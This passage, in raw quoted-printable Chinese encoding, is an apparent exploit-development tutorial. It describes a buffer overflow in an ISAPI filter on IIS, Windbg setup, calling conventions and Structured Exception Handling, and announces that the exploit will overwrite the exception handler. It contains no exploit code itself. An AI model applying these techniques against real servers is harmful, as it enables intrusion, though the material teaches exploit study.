=CA=BD=BB=AF=D7=D6=B7=FB=B4=AE=A3=AC=CB=F9=D2=D4=D4=DA=CA=E4=C8=EB=B2=CE=CA= =FDpszClientHostName=A1=A2pszClientUserName=A1=A2pszServerName=BB=F2=D5=DF= pszTarget=D6=D0=A3=AC=C8=CE=BA=CE=D2=BB=B8=F6=D7=E3=B9=BB=B3=A4=BE=CD=BB=E1= =C8=C3=BB=BA=B3=E5=C7=F8sz=D2=E7=B3=F6=A1=A3=D4=DA=CF=C2=C3=E6=B5=C4Explo= it=D6=D0=A3=AC=CE=D2=C3=C7=BE=CD=D2=AA=B2=FA=C9=FA=D2=BB=B8=F6=D7=E3=B9=BB= =B3=A4=B5=C4=B2=CE=CA=FDpszTarget=A3=AC=C8=C3=BB=BA=B3=E5=C7=F8sz=D2=E7=B3= =F6=A1=A3

=B0=D1=D5=E2=B8=F6=B3=CC=D0=F2=B1=E0=D2=EB=B3=C9=B6=AF=CC= =AC=C1=AA=BD=E1=BF=E2logger.dll=A3=AC=C8=BB=BA=F3=B8=F9=BE=DD=C7=B0=C3=E6= =BD=B2=B5=C4=B7=BD=B7=A8=D4=DAInternet=20 Service
manager=D6=D0=B0=D1=CB=FC=B6=A8=D2=E5=B3=C9ISAPI = Filter(=BC=FB=CF=C2=CD=BC)=A1=A3



=D4=DA=BD=E9=C9=DCExploit=D6=AE=C7=B0=A3=AC=C8=C3=CE=D2= =C3=C7=B7=C5=C2=FD=C7=B0=BD=F8=B5=C4=B2=BD=B7=A5=A3=AC=D2=F2=CE=AA=CE=D2=C3= =C7=BB=B9=D2=AA=D4=D9=D7=F7=D2=BB=D0=A9=D6=AA=CA=B6=D7=BC=B1=B8=A3=BA=C4=C7= =BE=CD=CA=C7=C8=E7=BA=CE=B0=B2=D7=B0=BC=B0=C9=E8=D6=C3Microsoft=B5=C4Debu= gger----Windbg=A3=AC=D2=D4=BC=B0Windows=B2=D9=D7=F7=CF=B5=CD=B3=B4=A6=C0=ED= Exception=20 =B5=C4=D2=BB=D6=D6=B7=BD=B7=A8----Structured Exception=20 = Handling(SEH)=A1=A3


Windbg=B5=C4=B0=B2=D7=B0=D3=EB=C9=E8=D6=C3= =A3=BA


=CC=FD=CB=B5Windbg=D2=D4=C7=B0=B5=C4=B0=E6=B1=BE=D3=D0=BA= =DC=B6=E0=C3=AB=B2=A1=A3=AC=B5=AB=CA=C7=CE=D2=CB=F9=D3=C3=B5=C4Version=20 = 5=B5=C4Windbg=B7=C7=B3=A3=B5=C4Powerful=A3=AC
=BC=C8=D3=D0=BA=DC=BA=C3= =B5=C4=D3=C3=BB=A7=BD=E7=C3=E6=A3=AC=D3=D6=D3=D0=D7=E3=B9=BB=B6=E0=B5=C4=B9= =A6=C4=DC=A3=AC=B4=F3=B8=C5=CA=C7=CE=D2=CB=F9=D3=C3=B9=FD=B5=C4=D7=EE=BA=C3= =B5=C4Debugger=A1=A3=CE=D2=C3=C7=D4=DA
Windows=BB=B7=BE=B3=CF=C2=B1=E0= =B3=CC=D0=F2=D3=C3=B5=C4Visual=20 Studio Debugger=D6=BB=BE=DF=D3=D0User = Mode=B5=C4=C8=A8=CF=DE=A3=AC=B6=F8Windbg=D4=F2=CE=AAUser = Mode=BA=CDKernel=20 = Mode=C1=BD=C6=DCDebugger=A3=AC=D3=D0=B8=FC=B8=DF=B5=C4=C8=A8=CF=DE=A3=AC=BF= =C9=D2=D4=CC=E1=B9=A9=B8=FC=B6=E0=B5=C4Debugging=D0=C5=CF=A2=A1=A3GNU=B5=C4= gdb=B5=C4=D3=C3=BB=A7=BD=E7=C3=E6=BE=CD=B1=C8=B2=BB=C9=CFWindbg=A3=AC=D3=D0= =D2=BB=B4=CE=CE=D2=C9=F5=D6=C1=B7=A2=CF=D6=CB=FC=B5=C4=C4=B3=D0=A9=B0=E6=B1= =BE=C3=BB=B7=A8=C7=D0=BB=BBThread=A3=AC=D5=E6=CA=C7=CA=A7=CD=FB=A3=A1=D6=BB= =CA=C7=D5=E2=B8=F6gdb=D6=F7=D2=AA=C1=F7=D0=D0=D3=DALinux=A1=A2Unix=B2=D9=D7= =F7=CF=B5=CD=B3=A3=AC=B6=F8=C7=D2=CA=C7=C3=E2=B7=D1=CA=B9=D3=C3=A3=AC=CB=F9= =D2=D4Microsoft=C4=C3=CB=FC=C3=BB=B0=EC=B7=A8=A1=A3Solaris=B2=D9=D7=F7=CF= =B5=CD=B3=C9=CF=B5=C4adb(=CE=D2=D4=DA=C7=B0=C3=E6=B5=DA=B6=FE=D5=C2=D3=C3= =B5=BD=C1=CB=CB=FC)=B4=F3=B8=C5=CA=C7=CA=AF=C6=F7=CA=B1=B4=FA=B5=C4=C8=CB= =B1=E0=D0=B4=B5=C4=A3=AC=D3=C3=C6=F0=C0=B4=BA=DC=B2=BB=B7=BD=B1=E3=A3=AC=B6= =F8=C7=D2=B9=A6=C4=DC=B2=BB=C8=E7Windbg=A1=A2gdb=A1=A3=BE=DD=CB=B5Solaris= =D0=C2=B5=C4=B3=CC=D0=F2=BF=AA=B7=A2=BC=AF=B3=C9=BB=B7=BE=B3SunOne=D3=D0=BA= =DC=C7=BF=B5=C4Debugging=20 = Tools=A3=AC=BF=C9=CF=A7=CE=D2=C9=D0=CE=DE=D4=B5=B3=A2=CA=D4=A1=A3

= =CE=D2=CA=C7=B4=D3MSDN CD Windows 2000 Customer=20 Support--Diagnostic = Tools=D6=D0=B0=B2=D7=B0Windbg=B5=C4=A3=AC
=C4=E3=D2=B2=BF=C9=D2=D4=B4=D3= Windows 2000 DDK=20 CD=BB=F2=D5=DFMicrosoft Platform SDK = CD=D6=D0=B0=B2=D7=B0=CB=FC=A1=A3=B4=D3=CD=AC=D2=BB=D5=C5
CD=D6=D0=CE=D2= =BB=B9=B0=B2=D7=B0=C1=CB=C6=E4=CB=FBDebugging=20 Tools=CF=F3i386kd(Kernel Debugger)=A3=ACcdb(Console=20 =
Debugger)=A3=ACUserDump(=BF=C9=D2=D4Dump=BD=F8=B3=CC=C4=DA=B4=E6)=D2=D4= =BC=B0=D2=BB=B4=F3=B6=D1=B7=FB=BA=C5(Symbol)=CE=C4=BC=FE--=D5=E2=CA=C7=D7= =F7Debugging=B1=D8=B2=BB=BF=C9=C9=D9=B5=C4=A3=AC=CB=FC=C3=C7=CC=E1=B9=A9=C1= =CBWindows=B2=D9=D7=F7=CF=B5=CD=B3=D6=D0=B8=F7=B8=F6=B6=AF=CC=AC=C1=AA=BD= =E1=BF=E2(dll)=CB=F9=D3=C3=B5=C4=BA=AF=CA=FDSymbol=A3=AC=B1=E4=C1=BFSymbo= l=B5=C8=A1=A3

=B0=B2=D7=B0=BA=C3=C1=CBWindbg=A3=AC=C7=EB=B0=D1=CB=FC= =C6=F4=B6=AF=A3=AC=CE=D2=C3=C7=D0=E8=D2=AA=D7=F7=D2=BB=D0=A9=BB=F9=B1=BE=B5= =C4=C9=E8=D6=C3=A1=A3

1=A1=A3=B4=D3View=20 =3D> Options=B4=F2=BF=AAWindows Debugger = Option=B6=D4=BB=B0=BF=F2=A3=BA

=D4=DA=D1=A1=CF=EESource=20 Files=3D> Search = Order=CA=E4=C8=EB=D4=B4=B3=CC=D0=F2=C2=B7=BE=B6=A3=AC=D2=F2=CE=AA=CE=D2=C3= =C7=D2=AA=B8=FA=D7=D9Filter logger=20 = =B1=BB=B9=A5=BB=F7=CA=B1=B5=C4=D4=CB=D0=D0=C7=E9=BF=F6=A3=AC=CB=F9=D2=D4=D4= =DA=D5=E2=C0=EF=CA=E4=C8=EB=CB=FC=B5=C4=C2=B7=BE=B6=A3=BAD:\MyJob\securit= ylab\ISAPI=A1=A3

=D4=DA=D1=A1=CF=EECall=20 Stack=3D> Display Options=C9=E8=D6=C3Call = Stack=B5=C4=CF=D4=CA=BE=B8=F1=CA=BD=A3=AC=D4=DA=D5=E2=C0=EF=C4=E3=BF=C9=D2= =D4=B8=F9=BE=DD=D0=E8=D2=AA=CB=E6=CA=B1=B8=C4=B1=E4Call=20 = Stack=CA=E4=B3=F6=B5=C4=C4=DA=C8=DD=A1=A3=CE=D2=CF=C8=D1=A1=D4=F1Frame = Pointer, Return Address, Function Name, Module=20 Name=A1=A3

=D4=DA=D1=A1=CF=EESymbols =3D>Debug = Symbol Search=20 = Path=D6=D0=CA=E4=C8=EB=B7=FB=BA=C5=CE=C4=BC=FE=C2=B7=BE=B6=A3=AC=B7=FB=BA= =C5=CE=C4=BC=FE=B5=C4=C8=B1=CA=A1=B0=B2=D7=B0=C2=B7=BE=B6=CA=C7%SystemRoo= t%\symbols=A3=AC=D4=DA=BB=FA=C6=F7dallas=C9=CF=CE=AAD:\WINNT\Symbols=A1=A3= =D7=A2=D2=E2=B6=D4=BB=B0=BF=F2=BB=B9=D3=D0=D1=A1=CF=EETransport=20 Layer=D6=A7=B3=D6=D4=B6=B3=CC(Remote) Debug=A3=AC = =D1=A1=CF=EEKernel Debugger=D6=A7=B3=D6Kernel=20 = Debug=A3=AC=B5=AB=CA=C7=CE=D2=C3=C7=D5=E2=D2=BB=D5=C2=B2=BB=D3=C3=CB=FC=C3= =C7=A1=A3

2=A1=A3=B4=D3Debug=3D>Exceptions=B4=F2=BF=AAException= s=B6=D4=BB=B0=BF=F2=A3=BA

=B6=D4Exception=20 = List=D6=D0=CB=F9=D3=D0=B5=C4Exception=A3=ACActions=D1=A1=CF=EE=BE=F9=D1=A1= =D4=F1Enabled=A1=A3=D5=E2=D1=F9=B5=B1=C8=CE=BA=CE=D2=BB=B8=F6Exception=B7= =A2=C9=FA=CA=B1=A3=AC=B1=C8=C8=E7=CB=B5=B7=A2=C9=FAAccess=20 = Violation(=C4=DA=B4=E6=B7=C3=CE=CA=B3=F6=B4=ED)=A3=ACWindbg=BB=E1=B5=C3=B5= =BDFirst=20 = Chance(=B5=DA=D2=BB=B4=CE=BB=FA=BB=E1)=B4=A6=C0=ED=D5=E2=B8=F6Exception=A1= =A3=BC=D9=C8=E7Actions=D1=A1=CF=EE=D1=A1Ignore=BB=F2=D5=DFNotify=B5=C4=BB= =B0=A3=AC=BD=AB=D3=C9=B1=BBDebugged=B5=C4=BD=F8=B3=CC(=BE=CD=CA=C7inetinf= o)=B5=C3=B5=BDFirst=20 = Chance=B4=A6=C0=ED=D5=E2=B8=F6Exception=A3=AC=CE=D2=C3=C7=B8=F9=B1=BE=BE=CD= =C3=BB=D3=D0=BB=FA=BB=E1=B9=DB=B2=EC=D4=DAException=B7=A2=C9=FA=C4=C7=D2=BB= =CB=B2=BC=E4=B5=C4=BC=C4=B4=E6=C6=F7=D7=B4=CC=AC=A3=AC=C4=DA=B4=E6=D7=B4=CC= =AC=B5=C8=B5=C8=A1=A3=C1=ED=CD=E2=D7=A2=D2=E2=A3=AC=D4=DA=CD=AC=D2=BBExce= ptions=B6=D4=BB=B0=BF=F2=D6=D0=A3=AC=CE=D2=B2=A2=C3=BB=D3=D0=D6=B8=B6=A8=C8= =CE=BA=CEFirst=20 Chance = Command=A3=AC=CB=F9=D2=D4Windbg=D4=DA=B5=C3=B5=BDFirst=20 = Chance=B4=A6=C0=EDException=CA=B1=A3=AC=CE=A8=D2=BB=C4=DC=D7=F7=B5=C4=CA=C2= =BE=CD=CA=C7=CD=A3=D4=DA=B3=F6=B4=ED=B5=C4=D6=B8=C1=EE=B4=A6=A3=AC=B5=C8=D7= =C5Windbg=B5=C4=B2=D9=C5=CC=CA=D6----=CE=D2=C3=C7=C0=B4=BE=F6=B6=A8=C8=E7= =BA=CE=B4=A6=C0=ED=D5=E2=B8=F6Exception=A3=AC=D5=E2=CA=B1=CE=D2=C3=C7=BE=CD= =BF=C9=D2=D4=CC=F8=BD=F8=C8=A5=D1=D0=BE=BF=BD=F8=B3=CC=B5=C4=B8=F7=D6=D6=D7= =B4=CC=AC=D0=C5=CF=A2=A1=A3

Windbg=D3=D0=B7=C7=B3=A3=B7=E1=B8=BB=B5= =C4=C3=FC=C1=EE=A3=AC=D3=D0=D2=BB=D0=A9=BE=CD=CF=F3=A1=B0=BB=D8=A1=B1=D7=D6= =B5=C4=B5=DAN=D6=D6=D0=B4=B7=A8=D2=BB=D1=F9=A3=AC=C4=E3=BF=C9=C4=DC=D2=BB= =B1=B2=D7=D3=B6=BC=B2=BB=BB=E1=D3=C3=B5=BD=A1=A3=B6=F8=C7=D2=A3=AC=CF=F3M= icrosoft=B5=C4=C6=E4=CB=FC=C8=ED=BC=FE=D2=BB=D1=F9=A3=AC=CB=FC=B5=C4=D0=ED= =B6=E0=C3=FC=C1=EE=D2=B2=BF=C9=D2=D4=D6=B1=BD=D3=D3=C3=CA=F3=B1=EA=B4=D3G= raphical=20 User=20 = Interface(GUI)=B5=F7=D3=C3=A1=A3=CB=F9=D2=D4=C4=D8=A3=AC=CE=D2=BE=CD=B2=BB= =D7=A8=C3=C5=BD=E9=C9=DC=CB=FC=C3=C7=C1=CB=A3=AC=CE=D2=BD=AB=D4=DA=BA=F3=C3= =E6Exploit=CA=B1=B8=F9=BE=DD=D0=E8=D2=AA=BD=E9=C9=DC=CB=F9=D3=C3=B5=C4=C3= =FC=C1=EE=A1=A3

=CF=C2=C3=E6=D4=D9=B2=B9=B3=E4=D2=BB=B5=E3=B9=D8=D3= =DASymbol(=B7=FB=BA=C5)=B7=BD=C3=E6=B5=C4=B6=AB=B6=AB=A3=AC=D5=E2=B6=D4=CE= =D2=C3=C7=BA=F3=C3=E6=B1=E0=D0=B4=BC=B0Debug=BB=E3=B1=E0=B3=CC=D0=F2=BA=DC= =D6=D8=D2=AA=A1=A3=C9=CF=D2=BB=D5=C2=CC=E1=B5=BD_stdcall=C0=E0=D0=CD=B5=C4= =BA=AF=CA=FD=A3=AC=CB=FC=B5=C4=BA=AF=CA=FD=C3=FB=B7=FB=BA=C5=BE=DF=D3=D0_= symbol@N=B5=C4=C4=A3=CA=BD=A3=AC=B7=FB=BA=C5@=BA=F3=C3=E6=B5=C4N=CE=AA=CB= =F9=D3=D0=CA=E4=C8=EB=B2=CE=CA=FD=B5=C4=D7=DC=D7=D6=BD=DA=A3=AC=D4=DA=B5=F7= =D3=C3_stdcall=BA=AF=CA=FD=C7=B0=A3=AC=D5=E2=D0=A9=CA=E4=C8=EB=B2=CE=CA=FD= =D0=E8=D2=AA=D3=C9=D3=D2=CF=F2=D7=F3=D1=B9=C8=EB=B6=D1=D5=BB=A1=A3Windows= =CF=B5=CD=B3=D6=D0=B5=C4=D6=B4=D0=D0=B3=CC=D0=F2=BB=F2=B6=AF=CC=AC=C1=AA=BD= =E1=BF=E2=BB=B9=D3=D0=C1=ED=CD=E2=C1=BD=D6=D6=C0=E0=D0=CD=B5=C4=BA=AF=CA=FD= =A3=BA=B5=DA=D2=BB=D6=D6=CA=C7_cdel=BA=AF=CA=FD=A3=AC=CB=FC=B5=C4=BA=AF=CA= =FD=C3=FB=B7=FB=BA=C5=BE=DF=D3=D0_symbol=C4=A3=CA=BD=A3=AC=D7=A2=D2=E2=CB= =FC=B5=C4=B7=FB=BA=C5=D6=D0=B2=A2=C3=BB=D3=D0=B1=EA=B3=F6=CA=E4=C8=EB=B2=CE= =CA=FD=D7=DC=D7=D6=BD=DA=CA=FD=A3=AC=D4=DA=B5=F7=D3=C3_cdel=BA=AF=CA=FD=C7= =B0=CB=FC=B5=C4=CA=E4=C8=EB=B2=CE=CA=FD=D0=E8=D2=AA=D3=C9=D3=D2=CF=F2=D7=F3= =D1=B9=C8=EB=B6=D1=D5=BB=A1=A3=B5=DA=B6=FE=D6=D6=C0=E0=D0=CD=B5=C4=BA=AF=CA= =FD=CA=C7_fastcall=BA=AF=CA=FD=A3=AC=CB=FC=B5=C4=BA=AF=CA=FD=C3=FB=B7=FB=BA= =C5=BE=DF=D3=D0@symbol@N=C4=A3=CA=BD=A3=AC=B7=FB=BA=C5@=BA=F3=C3=E6=B5=C4= N=CE=AA=CB=F9=D3=D0=CA=E4=C8=EB=B2=CE=CA=FD=B5=C4=D7=DC=D7=D6=BD=DA=CA=FD= =A3=BB=B5=AB=D3=EB_stdcall=BC=B0_cdel=BA=AF=CA=FD=B2=BB=CD=AC=B5=C4=CA=C7= =A3=AC_fastcall=B5=C4=C7=B0=C1=BD=B8=F6=CA=E4=C8=EB=B2=CE=CA=FD(=D3=C9=D3= =D2=CF=F2=D7=F3=CA=FD=B9=FD=C0=B4)=BD=AB=CD=A8=B9=FD=BC=C4=B4=E6=C6=F7=B4= =AB=B8=F8_fastcall=BA=AF=CA=FD(=B5=DA=C8=FD=B8=F6=BC=B0=D2=D4=BA=F3=B5=C4= =B2=CE=CA=FD=C8=D4=C8=BB=CD=A8=B9=FD=B6=D1=D5=BB=B4=AB=B5=DD)=A3=AC=D3=C9= =D3=DA=CA=C7=CD=A8=B9=FD=BC=C4=B4=E6=C6=F7=B4=AB=B5=DD=CA=E4=C8=EB=B2=CE=CA= =FD=A3=AC=B1=BB=B5=F7=D3=C3=B5=C4_fastcall=BA=AF=CA=FD=B2=BB=D0=E8=D2=AA=B6= =C1=C8=A1=C4=DA=B4=E6=C0=B4=C8=A1=B5=C3=CA=E4=C8=EB=B2=CE=CA=FD=A3=AC=CB=F9= =D2=D4=B5=F7=D3=C3=B5=C4=CB=D9=B6=C8=B1=C8_stdcall=BA=CD_cdel=BF=EC=A1=A3=

=C4=E3=C3=C7=BB=B9=BB=E1=BE=AD=B3=A3=BF=B4=B5=BD=D3=D0=B5=C4=BA=AF= =CA=FD=C3=FB=BE=DF=D3=D0_imp_symbol=A3=AC_imp_symbol@N=A3=AC=20 = _imp_@symbol@N=B5=C4=C4=A3=CA=BD=A3=AC=D5=E2=D0=A9=B7=D6=B1=F0=CA=C7=D0=E8= =D2=AA=B4=D3=C6=E4=CB=FB=BF=E2=CE=C4=BC=FE=D6=D0=CA=E4=C8=EB=B5=C4_cdel=A3= =AC_stdcall=A3=AC_fastcall=BA=AF=CA=FD=A1=A3


=B9=D8=D3=DAStruc= tured=20 Exception=20 = Handling=A3=BA


=D4=DA=C9=CF=D2=BB=D5=C2=C0=EF=C3=E6=A3=AC=CE=D2= =C3=C7=CD=A8=B9=FD=B8=B2=B8=C7=B1=BB=B5=F7=D3=C3=BA=AF=CA=FD=B7=B5=BB=D8=B5= =D8=D6=B7=B5=C4=B7=BD=B7=A8=B0=D1=BD=F8=B3=CC=D4=CB=D0=D0=B7=BD=CF=F2=D6=B8= =CF=F2=CE=D2=C3=C7=B5=C4=BA=DA=BF=CD=C2=EB=A3=AC=B2=BB=B9=FD=CE=D2=BF=B4=B5= =BD=BA=DC=B6=E0=D4=DAWindows=CF=C2=B5=C4Exploit=B6=BC=C0=FB=D3=C3=B8=B2=B8= =C7Exception=20 = Handler=B5=C4=B7=BD=B7=A8=C0=B4=C8=A1=B5=C3=BD=F8=B3=CC=B5=C4=BF=D8=D6=C6= =C8=A8=A3=AC=CF=F3=C7=B0=C3=E6=CC=E1=B5=BD=B5=C4jill=BE=CD=CA=C7=D5=E2=D1= =F9=A3=BA=CB=FC=CF=F2Microsoft=20 = IIS=B7=A2=B3=F6=D2=BB=B8=F6=B5=C4=B3=A4=D7=D6=B7=FB=B4=AE=A3=AC=D5=E2=B8=F6= =D7=D6=B7=FB=B4=AE=D4=DA=D2=E7=B3=F6ms3prt.dll=D6=D0=B5=C4=BB=BA=B3=E5=C7= =F8=BA=F3=C8=D4=C8=BB=C2=ED=B2=BB=CD=A3=CC=E3=B5=D8=CF=F2=C7=B0=B3=E5=A3=AC= =D2=BB=D6=B1=B5=BDException=20 = Handler=B1=BB=B8=B2=B8=C7=CE=AA=D6=B9=A1=A3=CB=F9=D2=D4=CE=D2=BE=F6=B6=A8= =D5=E2=D2=BB=D5=C2=D2=B2=C8=E7=B7=A8=C5=DD=D6=C6=A3=AC=CF=F2Exception=20 = Handler=BF=AA=C5=DA=A3=A1=A3=A1

=CE=D2=C3=C7=D6=AA=B5=C0=D4=DAC++=D3= =EF=D1=D4=C0=EF=A3=AC=B4=A6=C0=EDException=B5=C4=B7=BD=B7=A8=BF=C9=D2=D4=BC= =F2=D0=B4=B3=C9=A3=BA

try{
    =BF=C9=C4=DC= =B3=F6=B4=ED=B5=C4=B4=FA=C2=EB
}=20
catch(=C4=B3=D6=D6Exception=20 = class)
{
    =B4=A6=C0=ED=C4=B3=D6=D6Exception = = class=B5=C4=B4=FA=C2=EB
}

=B5=AB=CA=C7=CE=D2=D5=E2=C0=EF=D2=AA=CB= =B5=C1=ED=CD=E2=D2=BB=D6=D6=B4=A6=C0=EDException=B5=C4=B7=BD=B7=A8=A3=BAS= tructured Exception=20 = Handling=A3=AC=BB=F2=D5=DF=BC=F2=D0=B4=CE=AASEH=A1=A3=D4=DA=BA=F3=C3=E6=B7= =B4=BB=E3=B1=E0ISAPI=20 = Filter=B3=CC=D0=F2logger=CA=B1=A3=AC=B4=F3=BC=D2=BF=C9=D2=D4=BF=B4=B5=BD=CB= =FC=CA=C7=B0=B4SEH=B5=C4=B7=BD=B7=A8=C0=B4=C9=E8=D6=C3Exception=20 = Handler=B5=C4=A1=A3=CF=C2=C3=E6=CA=C7=D2=BB=B8=F6SEH=B5=C4=D3=EF=B7=A8=C0= =FD=D7=D3=A3=BA

_try{
    __try=20 = {
          =20 = =BF=C9=C4=DC=B3=F6=B4=ED=B5=C4=B4=FA=C2=EB
    }=20
    __except(filter_i)=20
    {=20 =
        =B4=A6=C0=EDException= =20 =B5=C4=B4=FA=C2=EB
    } =
__except(filter_i1)
{=20
    =B4=A6=C0=EDException = =B5=C4=B4=FA=C2=EB
}=20 =

=D4=DAC++=D6=D0=B1=BBcatch=B5=C4Exception=CA=C7class=C0=E0=D0=CD=A3= =AC=B5=ABSEH=D6=D0=C8=B4=B2=BB=D2=BB=D1=F9=A3=AC=CB=FC=B1=BB_except=B5=C4= filter=B1=D8=D0=EB=CA=C7=D5=FB=CA=FD=C0=E0=D0=CD=A1=A3=B8=F9=BE=DDEXCPT.H= =D6=D0=B5=C4=B6=A8=D2=E5=A3=ACSEH=D6=D0=B5=C4filter=BF=C9=D2=D4=D3=D0=CF=C2= =C3=E6=B5=C4=D6=B5=A3=BA
/*
*=20 Legal values for expression in = except().
*/

#define=20 = EXCEPTION_EXECUTE_HANDLER      =20 1
#define=20 = EXCEPTION_CONTINUE_SEARCH      =20 0
#define=20 = EXCEPTION_CONTINUE_EXECUTION    -1

=C6=E4=D6=D0= EXCEPTION_EXECUTE_HANDLER=B1=ED=CA=BE=B5=B1=C7=B0_except=D2=AA=B4=A6=C0=ED= =D5=E2=B8=F6Exception=A3=AC=B6=F8=C7=D2=D4=DA=B4=A6=C0=ED=CD=EA=D5=E2=B8=F6= Exception=BA=F3=B3=CC=D0=F2=BC=B4=D6=D5=D6=B9(Terminated)=A3=BBEXCEPTION_= CONTINUE_SEARCH=B1=ED=CA=BE=B5=B1=C7=B0=B5=C4_except(=B1=C8=C8=E7=CB=B5=C9= =CF=C3=E6=B5=C4__except(exception=20 i) = )=B2=BB=B4=A6=C0=ED=D5=E2=B8=F6Exception=A3=AC=C7=EB=CD=F9=CF=C2=BC=CC=D0= =F8=D5=D2=C6=E4=CB=FB=B5=C4_except(=B1=C8=C8=E7=CB=B5__except(exception = i1)=20 = )=C0=B4=B4=A6=C0=ED=D5=E2=B8=F6Exception=A3=BB=D7=EE=BA=F3=D2=BB=B8=F6EXC= EPTION_CONTINUE_EXECUTION=B1=ED=CA=BE=CF=A3=CD=FB=B3=CC=D0=F2=B2=BB=D2=AA= =B4=F3=BE=AA=D0=A1=B9=D6=A3=AC=C7=EB=BA=F6=C2=D4=D5=E2=B8=F6Exception=A3=AC= =BC=CC=D0=F8=D6=B4=D0=D0=CF=C2=C8=A5=A1=A3

SEH=D6=D0=BB=B9=D3=C3=B5= =BD_finally=BA=CD_leave=A3=AC=B2=BB=B9=FD=CB=FC=C3=C7=B2=BB=CA=C7=CE=D2=C3= =C7=B9=D8=D0=C4=B5=C4=BD=B9=B5=E3=A3=AC=CF=C8=B7=C5=D4=DA=D2=BB=B1=DF=A1=A3= =D3=D0=D0=CB=C8=A4=B5=C4=C5=F3=D3=D1=D7=D4=BC=BA=D5=D2=CA=E9=BF=B4=BF=B4=A1= =A3

=CE=D2=C3=C7=BD=E1=BA=CF=CA=B5=C0=FD=C0=B4=B7=D6=CE=F6=D2=BB=CF= =C2SEH=D4=DA=BB=E3=B1=E0=D3=EF=D1=D4=C4=C7=D2=BB=BC=B6=CA=C7=C8=E7=BA=CE=C9= =E8=D6=C3=CB=FC=B5=C4Exception=20 = Handler=B5=C4=A3=AC=C7=EB=BF=B4=CF=C2=C3=E6=B5=C4=B3=CC=D0=F2=A3=BA
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3Dexception.cpp=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>

//=20 exception.cpp : Defines the entry point for the console=20 application.
//
#include <stdio.h>
#include=20 <EXCPT.H>
#include <WTYPES.H>

DWORD=20 FilterFunction()
{ =
    printf("In Filter=20 = \n");           &n= bsp;        =20 // printed first
    return=20 = EXCEPTION_EXECUTE_HANDLER;
    //return=20 EXCEPTION_CONTINUE_SEARCH;
}

VOID main(VOID) =
{=20
    __try =
    {=20 =
           &nb= sp;RaiseException(1,        =20 // exception code=20 =
           &nb= sp;    0,       &n= bsp;           &nb= sp;//=20 continuable exception=20 =
           &nb= sp;    0,=20 = NULL);           &= nbsp;=20 // no arguments

    }=20
    __except ( FilterFunction() )=20
    {=20 =
        printf("Do=20 = Nothing\n");          &= nbsp;     //=20 this is printed last
    }
}=20 =

<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>
=B3=CC=D0=F2exception.cpp=B9=CA=D2=E2=D4=DA_try{}=D6=D0=D3=C3=BA=AF=CA= =FDRaiseException=B2=FA=C9=FA=D2=BB=B8=F6Exception=A3=AC=EC=B6=CA=C7=D3=C9= __except=BA=F3=C3=E6=D4=B2=C0=A8=BA=C5=C0=EF=B5=C4FilterFunction()=C0=B4=BE= =F6=B6=A8=CA=C7=B7=F1=B4=A6=C0=ED=D5=E2=B8=F6Exception=A1=A3=D3=C9=D3=DAF= ilterFunction()=B5=C4=B7=B5=BB=D8=D6=B5=CE=AAEXCEPTION_EXECUTE_HANDLER=A3= =AC=D2=B2=BE=CD=CA=C7=CB=B5__except=BF=C9=D2=D4=B4=A6=C0=ED=D5=E2=B8=F6Ex= ception=A3=AC=CB=F9=D2=D4__except=BA=F3=C3=E6=BB=A8=C0=A8=BA=C5=D6=D0=B5=C4= =B4=FA=C2=EB=BD=AB=B1=BB=D6=B4=D0=D0(=D2=B2=BE=CD=CA=C7=D6=B4=D0=D0printf= =BA=AF=CA=FD)=A3=AC=D7=EE=BA=F3=B3=CC=D0=F2=D6=D5=D6=B9=A1=A3

=CE=D2= =C3=C7=B0=D1=D5=E2=B8=F6exception.cpp=D4=DAMicrosoft=20 Visual = Studio=B1=E0=D2=EB=BA=C3=A3=AC=D5=E2=C0=EF=CE=D2=CF=C8=D2=AA=CC=E1=D0=D1=B4= =F3=BC=D2=D2=BB=BE=E4=A3=BA=D3=C9=D3=DA=CE=D2=C3=C7=CA=C7=D3=C3VC++=B5=C4= =B1=E0=D2=EB=C6=F7=B1=E0=D2=EB=D5=E2=B8=F6=B3=CC=D0=F2=A3=ACVC++=D4=DA=CA= =B5=CF=D6Structured=20 Exception=20 = Handling=CA=B1=D7=F7=C1=CB=D2=BB=D0=A9VC++=CC=D8=D3=D0=B5=C4=B4=A6=C0=ED=A3= =AC=CB=F9=D2=D4=C4=E3=C3=C7=BF=B4=B5=BD=B5=C4SEH=D2=D1=BE=AD=B2=BB=CA=C7=D4= =AD=D6=AD=D4=AD=CE=B6=C1=CB=A3=BB=CF=C2=C3=E6=CE=D2=D6=BB=D7=C5=D6=D8=BD=E9= =C9=DC=D4=AD=D6=AD=D4=AD=CE=B6=B5=C4=C4=C7=D2=BB=B2=BF=B7=D6=A3=AC=C8=E7=B9= =FB=C4=E3=C3=C7=CF=EB=D6=AA=B5=C0SEH=D4=DAVC++=D6=D0=B5=C4=C8=AB=C3=B2=A3= =AC=CE=D2=CD=C6=BC=F6
Microsoft=20 Systems = Journal=D4=DA1997=C4=EA=D2=BB=D4=C2=B5=C4=D2=BB=C6=AA=CE=C4=D5=C2<<= A Crash Course On the Depths of=20 Win32 Structured Exception=20 = Handling>>=A1=A3

